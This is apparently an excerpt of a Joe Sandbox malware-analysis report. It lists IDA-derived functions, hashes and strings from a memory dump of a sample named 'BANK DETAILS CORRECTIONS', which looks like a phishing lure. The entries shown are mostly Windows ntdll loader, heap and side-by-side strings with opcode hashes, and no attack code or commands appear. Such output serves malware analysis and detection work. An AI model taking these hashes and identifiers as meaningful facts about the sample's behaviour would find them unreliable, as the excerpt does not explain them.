                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    • Opcode ID: 343d64d0b2cabf66a10a8a323ef1d7222ca2a76a0156468951f7ef095d46f07e
                                                                                    • Instruction ID: d8f0e35b5a0802e3fe6077dacaf4142f5d143f16e63dc8681cd8ce830b981e68
                                                                                    • Opcode Fuzzy Hash: 343d64d0b2cabf66a10a8a323ef1d7222ca2a76a0156468951f7ef095d46f07e
                                                                                    • Instruction Fuzzy Hash: B4912472A41316AFD322EF688890F5B77B8EBD5B15F850818FA4D6B240C770AC09CBD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0192EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                    • API String ID: 0-1109411897
                                                                                    • Opcode ID: a8f65f47745e921e85487f90d6a744f8ccd430c228f9ecaf5d2ac588ec832f24
                                                                                    • Instruction ID: d62441c44071e3a3cbcbe6e4a549ed5ea10883060a8ef0f46c652d7b3583d78b
                                                                                    • Opcode Fuzzy Hash: a8f65f47745e921e85487f90d6a744f8ccd430c228f9ecaf5d2ac588ec832f24
                                                                                    • Instruction Fuzzy Hash: 83A25A74A0562A8FDB64DF28CD98BADBBB5BF45705F2442E9D90DA7254DB309E80CF00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    • Opcode ID: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                    • Instruction ID: 39ba4bbf45e16e386c47d5a913cacb0be207af00f9f3897c9a16b70942305133
                                                                                    • Opcode Fuzzy Hash: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                    • Instruction Fuzzy Hash: F7913470B003169BEF36DF18D944BAE7BA9BF91B25F500168E90CBB285D7B49843C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0191645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpInitShimEngine, xrefs: 019799F4, 01979A07, 01979A30
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019799ED
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01979A11, 01979A3A
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01979A2A
                                                                                    • apphelp.dll, xrefs: 01916496
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01979A01
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-204845295
                                                                                    • Opcode ID: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                    • Instruction ID: 73cfb89cca0dad7e0be358aae39222391d1547f827cfb4d3b07e31ebed31053e
                                                                                    • Opcode Fuzzy Hash: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                    • Instruction Fuzzy Hash: 8451CE716083099FE725EF24C881EAB77E8FFC4758F00091DE589972A4DA70E984CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01998170
                                                                                    • LdrpInitializeImportRedirection, xrefs: 01998177, 019981EB
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01998181, 019981F5
                                                                                    • LdrpInitializeProcess, xrefs: 0195C6C4
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0195C6C3
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 019981E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    • Opcode ID: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                    • Instruction ID: 4b0ea49e231d2ac0249253796e71f977fc60fb051037c9785267ccda51ef8478
                                                                                    • Opcode Fuzzy Hash: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                    • Instruction Fuzzy Hash: A131F2B16443069FD724EF28DC46E2A7798FFD5B10F04055CF98DAB291E660ED05C7A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01952674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01992178
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01992160, 0199219A, 019921BA
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0199219F
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01992165
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01992180
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019921BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                    • Instruction ID: 4e4dfbd1684bcfbfd2f779d164df1a308044d61face4a9bda5167790122ca553
                                                                                    • Opcode Fuzzy Hash: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                    • Instruction Fuzzy Hash: A731C876A41215BBEB22DBD98C85F6A7B7CEBA5A51F054059FF0C77140D370AA00C7A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0196096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 01962DF0: LdrInitializeThunk.NTDLL ref: 01962DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D74
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 1404860816-0
                                                                                    • Opcode ID: c78e7c5477a1d9b6e594e4b9e624661067a83a8e6d73a68620339844a4214d96
                                                                                    • Instruction ID: c7bf07c1fccbef7a43a73a65302aac0067a78d93559ea7956074b62a72e34581
                                                                                    • Opcode Fuzzy Hash: c78e7c5477a1d9b6e594e4b9e624661067a83a8e6d73a68620339844a4214d96
                                                                                    • Instruction Fuzzy Hash: AB423A75900715DFDB21CF68C880BAAB7F9FF44314F1445AAE98DAB241E770AA84CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019329A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                    • API String ID: 0-3126994380
                                                                                    • Opcode ID: 9dc6119a04a62b40beed670eef5bcebdd6414134b89bcb8d91798bdb7c469e72
                                                                                    • Instruction ID: 2263b8c27ce2f3d33211e0634d25916320aa1cd3f7d30a45d4a5414921787a17
                                                                                    • Opcode Fuzzy Hash: 9dc6119a04a62b40beed670eef5bcebdd6414134b89bcb8d91798bdb7c469e72
                                                                                    • Instruction Fuzzy Hash: 7B92BE71E042499FDB25CF68C444BAEBBF5FF88304F188459E85AAB391D734AA45CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0192A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    • Opcode ID: 8f2d2f384c9040f6e941d0a9f9322be9df728f6ef95ec6f998478bb72bdfdb50
                                                                                    • Instruction ID: 295e381bf8dc5c335f09fda432275a49f95eb1fb666045ce987ad5564573c3d6
                                                                                    • Opcode Fuzzy Hash: 8f2d2f384c9040f6e941d0a9f9322be9df728f6ef95ec6f998478bb72bdfdb50
                                                                                    • Instruction Fuzzy Hash: 24C1CD72608392CFD721DF58C144B6AB7E8FF84704F04496AF999CBA55E334CA49CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01958402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpInitializeProcess, xrefs: 01958422
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0195855E
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01958421
                                                                                    • @, xrefs: 01958591
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    • Opcode ID: 69b2e1cdf97966f21dc1faa77ee83316d5d1bc3e4424a7bdf48ff5af229425a1
                                                                                    • Instruction ID: 0b8a4027efa2cfb3e9876b0a99d7baf7a9ec79e9d38f1db8f86ae6633d98a76a
                                                                                    • Opcode Fuzzy Hash: 69b2e1cdf97966f21dc1faa77ee83316d5d1bc3e4424a7bdf48ff5af229425a1
                                                                                    • Instruction Fuzzy Hash: 43917E71508345AFE762DF66C840F6BBAECFB84744F40092EFA8892151E734DA45CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019922B6
                                                                                    • .Local, xrefs: 019528D8
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 019921DE
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019921D9, 019922B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: 3116243cbe8eaf45496f7df416a967993479de41ddca320ed1dae729817854c3
                                                                                    • Instruction ID: f78dc8872868cbb2fc66482c24210b69526c2a1bbcca5430e48e19ce4c77306d
                                                                                    • Opcode Fuzzy Hash: 3116243cbe8eaf45496f7df416a967993479de41ddca320ed1dae729817854c3
                                                                                    • Instruction Fuzzy Hash: F0A1BE35900229DBDB25CF68C994BA9B7B8BF58314F2401E9DD0CAB351D730AE80CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01954AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01993437
                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0199342A
                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01993456
                                                                                    • RtlDeactivateActivationContext, xrefs: 01993425, 01993432, 01993451
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                    • API String ID: 0-1245972979
                                                                                    • Opcode ID: 63a04c9fed0dac0a6ec7019a98453b7bb13a2b834dd21bb0dd812532e46db05d
                                                                                    • Instruction ID: ce9b867b1aa87a908cd6ed35fcdfb80b92e01ed5439d94c4da9499dd8170c176
                                                                                    • Opcode Fuzzy Hash: 63a04c9fed0dac0a6ec7019a98453b7bb13a2b834dd21bb0dd812532e46db05d
                                                                                    • Instruction Fuzzy Hash: BD6124366407129FDB62CF2DC841B6AB7E9BFC0B51F168529EC5DAB240E730E941CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019810AE
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01981028
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0198106B
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01980FE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    • Opcode ID: 7ea066ea78b8b7d18bcdf4f876430523f0c828bc3caf09bcbdce9e9da4c885e4
                                                                                    • Instruction ID: 87c2fe14cef8b42ad090f946c9ea7353f153fc75ad950f838126297f38588cb4
                                                                                    • Opcode Fuzzy Hash: 7ea066ea78b8b7d18bcdf4f876430523f0c828bc3caf09bcbdce9e9da4c885e4
                                                                                    • Instruction Fuzzy Hash: 2E71ABB19043159FDB21EF18C884F9B7BACAF95764F440868FD4C8A64AD334D589CBE2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0194245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0198A9A2
                                                                                    • apphelp.dll, xrefs: 01942462
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0198A992
                                                                                    • LdrpDynamicShimModule, xrefs: 0198A998
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    • Opcode ID: 992477606965d11f12ba5b3f7b926b1ed7e5f9a82b3fdc2bde3c2433bc58f266
                                                                                    • Instruction ID: bc168d3eb0993a879533bd0e63839c70b3b4bab88fa36a7afe6711f4c59fdccd
                                                                                    • Opcode Fuzzy Hash: 992477606965d11f12ba5b3f7b926b1ed7e5f9a82b3fdc2bde3c2433bc58f266
                                                                                    • Instruction Fuzzy Hash: F7317079A00201EFDB32EF5DD885E6ABBB9FFC4B10F16005AF908A7259D7B45982C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01930770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: 06caf4823422a07489a170cfe05d53a012a80036db9cc709986192dd98c2c622
                                                                                    • Instruction ID: d596229fc8f65af92ca0d801ae71ad85ce1a7eb8f95198049192b483b7be6b38
                                                                                    • Opcode Fuzzy Hash: 06caf4823422a07489a170cfe05d53a012a80036db9cc709986192dd98c2c622
                                                                                    • Instruction Fuzzy Hash: 57F1B030600606DFEB26DF68C894F6AB7F9FF84704F188568E51A9B381D734E985CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01946962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $@
                                                                                    • API String ID: 0-1077428164
                                                                                    • Opcode ID: 59f3e96fac97cccdb6c23c4c30323a2151996e33c1d0c4123e1af2e5986ae267
                                                                                    • Instruction ID: b4dfce344fa4ffd7bca4fc37a81cd73a4a25dfe46c90aae3892eda59b3d8ae2e
                                                                                    • Opcode Fuzzy Hash: 59f3e96fac97cccdb6c23c4c30323a2151996e33c1d0c4123e1af2e5986ae267
                                                                                    • Instruction Fuzzy Hash: 11C27F716083459FE729CF68C881FABBBE9AFC9754F04892DE98D87241D734D805CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0191A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    • Opcode ID: 4e280f3d210a0cdcbf61e4acdc2d501afeebff9a3a68fa55d781dc85dadd6e62
                                                                                    • Instruction ID: 2a8999e040692932d369e8460a578ec4ac3d5a32533cc23cf7a6656bb6275088
                                                                                    • Opcode Fuzzy Hash: 4e280f3d210a0cdcbf61e4acdc2d501afeebff9a3a68fa55d781dc85dadd6e62
                                                                                    • Instruction Fuzzy Hash: F1A14C7191162A9BDB31DF68CC88BEAB7B8EF44711F1005EAEA0DA7250D7359E84CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01940BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpCheckModule, xrefs: 0198A117
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0198A121
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 0198A10F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-161242083
                                                                                    • Opcode ID: 07fc91a1d0241e9256770ff7c7fc766f48e9aa1076acc6166339c14f8a41116c
                                                                                    • Instruction ID: c0a087d71ac21cc61e6057796cc6317fc9d03c5fdf5b5638bbf2b5cba73fb47a
                                                                                    • Opcode Fuzzy Hash: 07fc91a1d0241e9256770ff7c7fc766f48e9aa1076acc6166339c14f8a41116c
                                                                                    • Instruction Fuzzy Hash: 3971D474E00205DFDB25EF68C940EAEB7F8FB88305F18446DE90ADB255E774A942CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01930A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-1334570610
                                                                                    • Opcode ID: ddbae10d99e7f06172912cf1dbe0acd4524e8c58be143becab8a254865713e30
                                                                                    • Instruction ID: 696c5927adca638da172add30f76d0680b46f2cec3b45c0ab62f04d840ddeab0
                                                                                    • Opcode Fuzzy Hash: ddbae10d99e7f06172912cf1dbe0acd4524e8c58be143becab8a254865713e30
                                                                                    • Instruction Fuzzy Hash: 8461AD30600306DFEB29DF28C484B6ABBF6FF85704F18855AE45D8B296D770E881CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0195C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 019982D7
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019982E8
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 019982DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1783798831
                                                                                    • Opcode ID: fb70c2343a0b2e756175a77c670ee8d4531344798dc59b40ea4462132b58ba8c
                                                                                    • Instruction ID: 76487882c84e6f21c34d81e8df5588e95dda11b0a8a2a7547e910d475216a934
                                                                                    • Opcode Fuzzy Hash: fb70c2343a0b2e756175a77c670ee8d4531344798dc59b40ea4462132b58ba8c
                                                                                    • Instruction Fuzzy Hash: 92410F7A504305ABCB21EB68D844F5B7BECEF89B50F00492AF94CE3294E770E801CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 019DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • @, xrefs: 019DC1F1
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019DC1C5
                                                                                    • PreferredUILanguages, xrefs: 019DC212
                                                                                    Memory Dump Source
